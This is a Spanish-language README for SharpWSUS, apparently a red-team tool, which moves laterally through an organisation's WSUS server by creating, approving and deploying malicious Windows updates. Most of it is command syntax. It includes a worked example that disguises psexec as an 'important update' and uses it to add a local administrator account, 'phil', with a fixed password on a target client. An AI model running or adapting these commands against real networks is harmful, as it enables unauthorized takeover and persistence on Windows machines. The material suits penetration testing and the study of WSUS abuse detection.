
Herramienta en C# para movimiento lateral a través de WSUS mediante la creación, aprobación e implementación de actualizaciones maliciosas dirigidas a clientes Windows en entornos de Active Directory.
SharpWSUS es una herramienta en CSharp para movimiento lateral a través de WSUS. Hay un blog correspondiente (https://labs.nettitude.com/blog/introducing-sharpwsus/) que contiene información más detallada sobre la herramienta, su caso de uso y detección.
Mucho crédito a los siguientes recursos que realmente hicieron el 90% de esto por mí. Esta herramienta es solo una mejora de los siguientes para la fiabilidad y flexibilidad de C2.
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
Los comandos listados a continuación tienen parámetros opcionales entre <>.
Localizar el servidor WSUS:
SharpWSUS.exe locate
Inspeccionar el servidor WSUS, enumerando clientes, servidores y grupos existentes:
SharpWSUS.exe inspect
Crear una actualización (NOTA: La carga útil debe ser un binario firmado por Windows):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>
Aprobar una actualización:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>
Verificar el estado de una actualización:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]
Eliminar una actualización y limpiar los grupos agregados:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
sharpwsus locate
sharpwsus inspect
sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"
sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"
sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local
sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"